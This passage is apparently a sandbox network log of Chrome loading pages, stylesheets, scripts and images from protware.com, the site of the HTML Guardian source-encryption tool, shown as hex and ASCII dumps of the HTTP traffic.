content="Encrypt HTML, Javascript, ASP. Protect links, images"><meta name="page-type" content="tool for encryption of html, asp, vbscript, javascript code"><li
              Nov 30, 2024 00:40:34.163924932 CET1236INData Raw: 6e 6b 20 68 72 65 66 3d 22 73 74 79 6c 65 5f 4d 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 20 3d 20 22 4a 61 76 61 73 63
              Data Ascii: nk href="style_M.css" rel="stylesheet" type="text/css"><script language = "Javascript" src = "frm.js"></script><script language="JavaScript" src="tpmnu.js"></script></head><body bgcolor = "white" onLoad = checkmf()><span id="Main" styl
              Nov 30, 2024 00:40:34.163938999 CET1236INData Raw: 20 67 65 74 20 0a 74 68 65 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 65 73 20 70 6f 73 74 65 64 20 6f 6e 20 79 6f 75 72 20 73 69 74 65 2e 20 54 68 65 20 70 72 6f 67 72 61 6d 73 20 6b 6e 6f 77 6e 20 61 73 20 73 69 74 65 2d 72 69 70 70 65 72 73 2c
              Data Ascii: get the email addresses posted on your site. The programs known as site-rippers, such as TeleportPro, will not be able to read the encrypted javascript and html source and download your entire site for offline use.<br> Although extremely
              Nov 30, 2024 00:40:34.164712906 CET1236INData Raw: 6f 74 65 63 74 69 6f 6e 22 3e 69 6d 61 67 65 20 70 72 6f 74 65 63 74 69 6f 6e 3c 2f 61 3e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 6d 75 63 68 20 6d 6f 72 65 2c 20 0a 6e 6f 74 20 6a 75 73 74 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 65 6e 63 72 79
              Data Ascii: otection">image protection</a> features and much more, not just to <a href="encrypt.html">encrypt html</a> source<br> </span><div id="LayerHome" > <br> Go to Start page </div> <div id="LayerFeatures" > Main HTML Guardian features<br>
              Nov 30, 2024 00:40:34.164725065 CET1236INData Raw: 65 76 65 6c 6f 70 65 72 20 61 6e 64 3c 62 72 3e 65 64 75 63 61 74 69 6f 6e 61 6c 20 6c 69 63 65 6e 73 65 73 20 6f 6e 6c 79 5d 0a 3c 2f 64 69 76 3e 20 20 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 35 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20
              Data Ascii: eveloper and<br>educational licenses only]</div> <table width="50%" border="0" align="center"> <tr> <td> <p align="center" class = "htmlgs"><font color="#000000"><b>ProtWare's</b></font> <font color="#009900"><b>HTML
              Nov 30, 2024 00:40:34.165410042 CET1182INData Raw: 0a 20 20 7c 20 3c 61 20 69 64 3d 22 64 6f 77 6e 6c 6f 61 64 22 20 68 72 65 66 3d 22 64 6f 77 6e 6c 6f 61 64 2e 68 74 6d 22 20 74 61 72 67 65 74 3d 22 6d 61 69 6e 22 20 6f 6e 6d 6f 75 73 65 6f 76 65 72 20 3d 20 73 68 6f 77 6e 66 6f 28 22 44 6f 77
              Data Ascii: | <a id="download" href="download.htm" target="main" onmouseover = shownfo("Download","over") onmouseout =shownfo("Download","out")>Download</a> | <a id="buy" href="buy.htm" target="main" onmouseover = shownfo("Buy","over") onmouseout =s
              Nov 30, 2024 00:40:34.189867973 CET319OUTGET /stat.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.551762104 CET424INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:34 GMT
              Content-Type: text/javascript
              Content-Length: 186
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 66 75 6e 63 74 69 6f 6e 20 6e 73 39 28 29 7b 77 69 6e 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 50 72 6f 74 57 61 72 65 27 73 20 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 20 2d 20 74 68 65 20 77 6f 72 6c 64 27 73 20 73 74 61 6e 64 61 72 64 20 66 6f 72 20 77 65 62 73 69 74 65 20 70 72 6f 74 65 63 74 69 6f 6e 20 2d 20 45 6e 63 72 79 70 74 20 48 54 4d 4c 2c 20 41 53 50 2c 20 4a 61 76 61 73 63 72 69 70 74 2c 20 56 42 73 63 72 69 70 74 20 73 6f 75 72 63 65 2e 22 3b 73 65 74 54 69 6d 65 6f 75 74 28 22 6e 73 39 28 29 22 2c 32 30 30 29 3b 7d 3b 6e 73 39 28 29 3b
              Data Ascii: function ns9(){window.status = "ProtWare's HTML Guardian - the world's standard for website protection - Encrypt HTML, ASP, Javascript, VBscript source.";setTimeout("ns9()",200);};ns9();
              Nov 30, 2024 00:40:34.564600945 CET381OUTGET /new3.jpg HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.955167055 CET981INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:34 GMT
              Content-Type: image/jpeg
              Content-Length: 771
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 14 00 19 03 01 11 00 02 11 01 03 11 01 ff c4 00 18 00 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 06 07 04 05 ff c4 00 2a 10 00 01 03 03 02 05 02 07 00 00 00 00 00 00 00 00 01 02 03 04 05 06 11 00 31 13 21 32 41 81 15 22 07 12 51 53 71 91 a1 ff c4 00 1a 01 00 02 02 03 00 00 00 00 00 00 00 00 00 00 00 00 03 05 02 04 00 01 06 ff c4 00 2a 11 00 02 01 03 02 04 04 07 00 00 00 00 00 00 00 00 01 02 11 00 03 31 04 21 05 12 13 51 14 22 61 81 06 23 41 71 a1 c1 f0 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ae dd 57 2b 96 [TRUNCATED]
              Data Ascii: JFIFHHC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222*1!2A"QSq*1!Q"a#Aq?W+bv*(ln1o]mLok*"p{X2fQEA7tAMbSs=enn,e-_|jQh|N{&KquR*l_vKrJ@'lg}Tl,`opb%]P;3*xA@}2D"\R{AT*#O_.x8PDL)'3q[\E0Di%ICHAwYe q.!d7U\bwHNM_sIVi*PyglN4[WZ$1"=<j"4v#)5<$Aqp8P>`9u>
              Nov 30, 2024 00:41:19.956278086 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.44975468.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:33.803566933 CET474OUTGET /home.htm HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Referer: http://www.protware.com/
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.155447006 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:33 GMT
              Content-Type: text/html
              Content-Length: 8475
              Connection: keep-alive
              Last-Modified: Fri, 03 Feb 2023 16:04:36 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 6e 63 72 79 70 74 20 20 48 54 4d 4c 2c 20 4a 61 76 61 73 63 72 69 70 74 2c 20 41 53 50 2e 20 50 72 6f 74 65 63 74 20 6c 69 6e 6b 73 20 26 61 6d 70 3b 20 69 6d 61 67 65 73 3c 2f 74 69 74 6c 65 3e 0a 3c 4d 45 54 41 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 63 72 79 70 74 2c 70 72 6f 74 65 63 74 2c 68 74 6d 6c 2c 6a 61 76 61 73 63 72 69 70 74 2c 61 73 70 2c 76 62 73 63 72 69 70 74 2c 63 6f 64 65 2c 65 6d 61 69 6c 2c 73 63 72 61 6d 62 6c 65 20 22 3e 0a 3c 4d 45 54 41 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 63 72 79 70 74 20 70 72 6f 74 65 63 74 20 68 74 6d 6c 20 6a 61 76 61 73 63 72 69 70 74 20 61 73 70 20 65 6d 61 69 6c 20 73 63 72 61 6d 62 6c 65 22 3e 0a [TRUNCATED]
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Encrypt HTML, Javascript, ASP. Protect links &amp; images</title><META name="keywords" content="Encrypt,protect,html,javascript,asp,vbscript,code,email,scramble "><META name="description" content="Encrypt protect html javascript asp email scramble"><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" href="styleIE.css" type="text/css"><script language = "Javascript" src = "frm.js"></script><script src="stat.js"></script></head><body bgcolor="#FFFFFF" text="#000000"><script language="JavaScript" src="scroll.js"></script><table width="90%" border="0" align="center" > <tr> <td><div align="center"><span class="bo">February 2023</span>: HTML Guardian<font color="#009900" class="bo"> Version 7.9.1 [b.227]</font> is now available. Read what's new <a href="history.htm"><font color="#0000FF" class="bo">here</font></a> .</div></td> </tr
              Nov 30, 2024 00:40:34.155653000 CET1236INData Raw: 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 3e 3c 69 6d 67 20 73 72 63 3d 22 6e 65 77 33 2e 6a 70 67 22 20 77 69 64 74 68 3d 22 32 35 22 20 68 65 69 67 68 74 3d 22 32 30 22 3e 20 56 65 72 73 69 6f 6e 73 20 36 2e 32 20 61 6e 64 20 6c 61 74 65
              Data Ascii: > <tr> <td><img src="new3.jpg" width="25" height="20"> Versions 6.2 and later now include <font color="#0000FF" class="bo">Image Guardian</font>, the long awaited HTML Guardian add-on for enhanced <a href="image_prot
              Nov 30, 2024 00:40:34.155666113 CET1236INData Raw: 20 63 6f 6d 70 6c 69 63 61 74 65 64 20 3c 61 20 68 72 65 66 3d 22 73 63 72 69 70 74 73 2e 68 74 6d 22 20 63 6c 61 73 73 3d 22 73 31 69 22 3e 73 63 72 69 70 74 73 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 6f 72 20 6a 61 76 61 20 61 70 70 6c
              Data Ascii: complicated <a href="scripts.htm" class="s1i">scripts</a> or java applets that may have taken weeks to develop and debug, images, links, style sheets, articles ...<br> <br> Creating a professional-loo
              Nov 30, 2024 00:40:34.156323910 CET1236INData Raw: 65 73 2c 20 61 67 65 6e 63 69 65 73 2c 20 66 6f 75 6e 64 61 74 69 6f 6e 73 2c 20 73 6d 61 6c 6c 2d 20 61 6e 64 20 6d 65 64 69 75 6d 2d 73 69 7a 65 20 62 75 73 69 6e 65 73 73 65 73 2c 20 0a 20 20 20 20 20 20 20 20 20 20 6e 6f 6e 2d 70 72 6f 66 69
              Data Ascii: es, agencies, foundations, small- and medium-size businesses, non-profit organizations and individuals in more than 100 countries all over the globe. <br> <br><center> <a href="encrypt.html" title="Enc
              Nov 30, 2024 00:40:34.156337976 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 20 73 65 72 76 65 72 2d 73 69 64 65 20 69 6e 63 6c 75 64 65 73 28 2e 73 68 74 6d 6c 29 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 70 68 70 20 66 69 6c 65 73 2e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20
              Data Ascii: use server-side includes(.shtml), as well as php files.</li> <li class="bli"><a href="protect_images.htm"><font color="#009900"><b>Protect the images</b></font></a> on your website with <a href="image_pr
              Nov 30, 2024 00:40:34.157083988 CET1236INData Raw: 74 65 2e 3c 2f 6c 69 3e 0a 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 62 6c 69 22 3e 55 6e 70 61 72 61 6c 6c 65 6c 20 6c 65 76 65 6c 20 6f 66 20 73 65 63 75 72 69 74 79 2e 3c 2f 6c 69 3e 0a 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 62 6c 69 22 3e
              Data Ascii: te.</li><li class="bli">Unparallel level of security.</li><li class="bli">Advanced batch encryption capabilities - protect entire folders, websites or user-defined file lists at once with different security settings for each file. Full
              Nov 30, 2024 00:40:34.157098055 CET1236INData Raw: 72 3d 22 30 22 3e 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 62 6f 72 64 65 72 36 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 20 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 63 6f 70 79 3b 20 31
              Data Ascii: r="0"></a> <p class="tborder6" align="center"> &nbsp;&nbsp;&nbsp;&copy; 1997-2023, ProtWare Inc. All rights reserved.&nbsp;&nbsp;&nbsp;</p> <div align="center" style="hg10p"><font class="hg10p">|<a href="http://www.p
              Nov 30, 2024 00:40:34.157108068 CET56INData Raw: 66 6c 5f 41 4e 44 5f 4e 53 30 39 32 32 31 68 2d 31 37 35 73 65 63 5f 4c 37 30 30 34 5f 6e 65 77 68 63 55 32 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
              Data Ascii: fl_AND_NS09221h-175sec_L7004_newhcU2 --></body></html>
              Nov 30, 2024 00:40:34.187679052 CET338OUTGET /styleIE.css HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/css,*/*;q=0.1
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.538989067 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:34 GMT
              Content-Type: text/css
              Content-Length: 5395
              Connection: keep-alive
              Last-Modified: Sat, 12 Apr 2014 06:02:38 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 41 3a 6c 69 6e 6b 20 7b 43 4f 4c 4f 52 3a 20 23 30 30 30 30 30 30 3b 20 46 4f 4e 54 2d 57 45 49 47 48 54 3a 20 6e 6f 72 6d 61 6c 3b 20 54 45 58 54 2d 44 45 43 4f 52 41 54 49 4f 4e 3a 20 6e 6f 6e 65 7d 41 3a 76 69 73 69 74 65 64 20 7b 43 4f 4c 4f 52 3a 20 23 30 30 30 30 30 30 3b 20 46 4f 4e 54 2d 57 45 49 47 48 54 3a 20 6e 6f 72 6d 61 6c 3b 20 54 45 58 54 2d 44 45 43 4f 52 41 54 49 4f 4e 3a 20 6e 6f 6e 65 7d 41 3a 61 63 74 69 76 65 20 7b 42 41 43 4b 47 52 4f 55 4e 44 3a 20 23 46 46 46 46 46 46 3b 20 46 4f 4e 54 2d 57 45 49 47 48 54 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 7d 41 3a 68 6f 76 65 72 20 7b 46 4f 4e 54 2d 57 45 49 47 48 54 3a 20 62 6f 6c 64 3b 20 54 45 58 54 2d 44 45 43 4f 52 41 54 49 4f 4e 3a 20 6e 6f 6e 65 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 33 33 30 30 7d 68 31 20 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 [TRUNCATED]
              Data Ascii: A:link {COLOR: #000000; FONT-WEIGHT: normal; TEXT-DECORATION: none}A:visited {COLOR: #000000; FONT-WEIGHT: normal; TEXT-DECORATION: none}A:active {BACKGROUND: #FFFFFF; FONT-WEIGHT: bold; color: #000000}A:hover {FONT-WEIGHT: bold; TEXT-DECORATION: none; background-color: #FFFFFF; color: #FF3300}h1 {display:inline;font-family: Verdana, Arial, Helvetica, sans-serif;font-size: 12px;}.s1i:hover {COLOR: #000000; FONT-WEIGHT: normal; TEXT-DECORATION: none}TD {FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; FONT-SIZE: 12px; font-weight: normal}.input {COLOR: #663399; FONT-FAMILY: Courier New, Courier, monospace}.note {BORDER-BOTTOM: silver thin solid; BORDER-LEFT: silver thin solid; BORDER-RIGHT: silver thin solid; BORDER-TOP: silver thin solid; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; PADDING-BOTTOM: 0.3em; PADDING-LEFT: 0.3em; PADDING-RIGHT: 0.3em; PADDING-TOP: 0.3em; border: #333333; font-size: 12px; color: #000099}.figure {FONT-VARIANT: small-caps; FONT-WEIGHT: bold}.htmlg { BOR
              Nov 30, 2024 00:40:34.539171934 CET1236INData Raw: 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 36 36 36 36 63 63 20 30 70 78 20 73 6f 6c 69 64 3b 20 42 4f 52 44 45 52 2d 4c 45 46 54 3a 20 23 36 36 36 36 63 63 20 30 70 78 20 73 6f 6c 69 64 3b 20 42 4f 52 44 45 52 2d 52 49 47 48 54 3a 20 23 36 36 36 36
              Data Ascii: DER-BOTTOM: #6666cc 0px solid; BORDER-LEFT: #6666cc 0px solid; BORDER-RIGHT: #6666cc 0px solid; BORDER-TOP: #6666cc 0.1em solid; PADDING-TOP: 2px; background-color: #FFFFFF; color: #009900; padding-right: 1px; padding-bottom: 5px; padding-left
              Nov 30, 2024 00:40:34.543119907 CET1236INData Raw: 69 6f 6e 3a 20 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 7d 0a 2e 74 62 6f 72 64 65 72 36 20 7b 20 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 36 36 36 36 63 63 20 30 70
              Data Ascii: ion: none;display: none;font-weight: normal}.tborder6 { BORDER-BOTTOM: #6666cc 0px solid; BORDER-LEFT: #6666cc 0px solid; BORDER-RIGHT: #6666cc 0px solid; BORDER-TOP: #6666cc 0.1em solid; PADDING-TOP: 2px; background-color: #009900; color: #F
              Nov 30, 2024 00:40:34.543281078 CET1236INData Raw: 20 73 6f 6c 69 64 3b 20 50 41 44 44 49 4e 47 2d 54 4f 50 3a 20 32 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74
              Data Ascii: solid; PADDING-TOP: 2px; background-color: #FFFFFF; color: #000000; padding-right: 1px; padding-bottom: 5px; padding-left: 1px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; margin-right: 2px; margin-lef
              Nov 30, 2024 00:40:34.564780951 CET381OUTGET /prev.gif HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:34.939368963 CET982INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:34 GMT
              Content-Type: image/gif
              Content-Length: 773
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Data Raw: 47 49 46 38 39 61 1e 00 1e 00 e6 ff 00 14 13 13 72 6d 6d 4a 47 47 c0 c0 c0 29 28 28 c0 be be ff ff ff f5 f5 f5 eb eb eb e8 e8 e8 df df df de de de dd dd dd db db db da da da d2 d2 d2 cf cf cf cd cd cd cb cb cb ca ca ca c5 c5 c5 c4 c4 c4 c1 c1 c1 be be be bc bc bc b9 b9 b9 b8 b8 b8 b7 b7 b7 b5 b5 b5 b3 b3 b3 b1 b1 b1 af af af ae ae ae ad ad ad a9 a9 a9 a7 a7 a7 9f 9f 9f 9b 9b 9b 9a 9a 9a 96 96 96 8e 8e 8e 8d 8d 8d 8c 8c 8c 8a 8a 8a 87 87 87 86 86 86 80 80 80 7c 7c 7c 7b 7b 7b 78 78 78 77 77 77 74 74 74 71 71 71 70 70 70 6f 6f 6f 6e 6e 6e 6d 6d 6d 6a 6a 6a 68 68 68 66 66 66 65 65 65 64 64 64 63 63 63 62 62 62 61 61 61 60 60 60 5e 5e 5e 5d 5d 5d 5b 5b 5b 5a 5a 5a 59 59 59 58 58 58 56 56 56 54 54 54 53 53 53 52 52 52 51 51 51 4d 4d 4d 4c 4c 4c 4b 4b 4b 4a 4a 4a 49 49 49 48 48 48 47 47 47 46 46 46 42 42 42 3e 3e 3e 3d 3d 3d 3c 3c 3c 3a 3a 3a 38 38 38 37 37 37 34 34 34 32 32 32 30 30 30 2f 2f 2f 2e 2e 2e 2a 2a 2a 29 29 29 28 28 28 22 22 22 21 21 21 20 20 20 1e 1e 1e 1d 1d 1d 1b 1b 1b 19 19 19 18 18 18 17 [TRUNCATED]
              Data Ascii: GIF89armmJGG)((|||{{{xxxwwwtttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```^^^]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQMMMLLLKKKJJJIIIHHHGGGFFFBBB>>>===<<<:::888777444222000///...***)))((("""!!! !,@:>*!/$8svHbsttuk3cDuuD43)'(1FZhor[db`\MH-;9LRXakoqvl04$&7Ufosu52YKt@ABFcWI,S[$0EEj,(_7$l<v(,`@^q.i-,c8l3B:4H!c1$%(DA"tbH!(H|ILQiFMUfP8qD8YxvJ)J-T#!$-[e:nD8@;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.44975568.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:34.064214945 CET274OUTGET /mm.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:35.233195066 CET900INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: text/javascript
              Content-Length: 662
              Connection: keep-alive
              Last-Modified: Thu, 05 Apr 2007 14:17:09 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 42 72 77 73 72 20 3d 20 22 49 45 22 7d 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 34 22 7d 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 20 26 26 20 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 36 22 7d 0d 0a 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 4e 61 6d 65 20 3d 3d 22 4f 70 65 72 61 22 29 7b 42 72 77 73 72 20 3d 20 22 4f 70 65 72 61 22 7d 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 4d 4d 5f 72 65 6c 6f 61 64 50 61 67 65 28 69 6e 69 74 29 20 7b 20 20 2f 2f 72 65 6c 6f 61 64 73 20 74 68 65 20 77 69 6e 64 6f 77 20 69 66 20 4e 61 76 34 20 72 65 73 69 7a 65 64 0d 0a 20 20 69 66 20 28 69 6e 69 74 3d 3d 74 72 75 65 29 20 77 69 74 68 20 28 6e 61 76 69 67 61 74 6f 72 29 20 7b 69 66 20 28 28 61 70 70 4e 61 6d 65 3d 3d 22 4e 65 74 73 63 61 70 65 22 29 26 26 28 70 61 72 73 65 49 6e 74 28 61 70 70 56 65 72 73 69 6f 6e 29 [TRUNCATED]
              Data Ascii: if(document.all){Brwsr = "IE"}if(document.layers){Brwsr = "NN4"}if(document.getElementById && window.sidebar){Brwsr = "NN6"}if(navigator.appName =="Opera"){Brwsr = "Opera"}function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();}MM_reloadPage(true);/*if(Brwsr != "NN4"){window.moveTo(0,0);window.resizeTo(screen.availWidth,screen.availHeight) }*/
              Nov 30, 2024 00:40:36.171252966 CET285OUTGET /encrypt_html.ico HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.523488045 CET1001INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:36 GMT
              Content-Type: image/x-icon
              Content-Length: 766
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 00 00 01 00 01 00 20 20 10 00 00 00 00 00 e8 02 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 77 77 77 77 77 77 77 77 77 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 77 00 00 00 00 00 33 bb ff bb bb bb bb bb 33 07 77 70 00 00 00 00 3b bb ff bb bb bb bb b3 b3 30 77 70 00 00 00 00 33 bb ff bb bb bb bb bb 33 33 07 70 00 00 00 00 3b bb ff 0b bb 0b bb b3 b3 33 07 70 00 00 00 00 33 bb f0 0b bb 00 bb bb 33 33 07 70 00 00 00 00 3b bb 00 bb bb b0 0b b3 b3 33 07 70 00 00 00 00 33 b0 0f bb bb bb 00 bb 33 33 07 70 00 00 00 00 3b b0 ff bb bb bb b0 b3 b3 33 07 70 00 00 00 00 33 b0 ff bb bb bb b0 bb 33 33 07 70 00 00 00 00 3b b0 0f bb bb bb 00 b3 b3 33 07 70 00 00 00 00 33 bb 00 bb bb b0 0b bb 33 33 07 70 00 00 00 00 3b [TRUNCATED]
              Data Ascii: ( @wwwwwwwwwpww33wp;0wp333p;3p333p;3p333p;3p333p;3p333p;3p333p;3p3p3033330?333333pppppppwpwwwp0wwp;333;ppp??
              Nov 30, 2024 00:41:21.534348011 CET6OUTData Raw: 00
